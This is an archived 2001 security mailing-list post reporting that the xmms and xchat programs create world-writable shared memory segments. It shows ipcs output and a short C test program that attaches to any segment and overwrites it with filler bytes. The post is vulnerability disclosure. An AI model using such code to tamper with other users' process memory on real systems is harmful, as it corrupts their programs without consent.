xmms/xchat full access shared memory segments

From: Julien VANEGUE (vanegu_jat_private)
Date: Sat Nov 03 2001 - 02:22:23 PST

Next message: Bruce Campbell: "vulnerability diagnosis in "nessus" incorrect..."

Previous message: Eric: "Downloading individual patch for MS01-054"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On slackware 8 :

bash-2.05$ ipcs -m

------ Shared Memory Segments --------
key        shmid      owner      perms      bytes      nattch     status      
0x00000000 4216960    mayhem    777        196608     2          dest         
0x00000000 7636737    mayhem    777        196608     2          dest         

bash-2.05$ ipcs -p -m

------ Shared Memory Creator/Last-op --------
shmid      owner      cpid       lpid      
4216960    mayhem     3921       1406      
7636737    mayhem     26206      26209     

bash-2.05$ cat /proc/3921/cmdline ; echo
/opt/gnome/bin/xmms
bash-2.05$ cat /proc/26206/cmdline ; echo
/opt/gnome/bin/xchat
bash-2.05$ 



Seems not to be exploitable (no fault) but still need to be fixed .

/*
** test_shm.c
** 
** Made by Julien Vanegue
** Login   <mayhemat_private>
*/
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <stdio.h>
#include <stdlib.h>


#define	FATAL(str) { perror(str); exit(-1); }


void	usage()
{
  fprintf(stderr, "syntax: a.out semid size \n");
  exit(-1);
}


int	main(int argc, char **argv)
{
  char	*addr;

  if (argc != 3)
    usage();
  if ((addr = shmat(atoi(argv[1]), 0, 0)) == (void *) -1)
    FATAL("shmget");
  memset(addr, 'A', atoi(argv[2]));
  sleep(2);
}

Next message: Bruce Campbell: "vulnerability diagnosis in "nessus" incorrect..."
Previous message: Eric: "Downloading individual patch for MS01-054"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Nov 04 2001 - 18:28:08 PST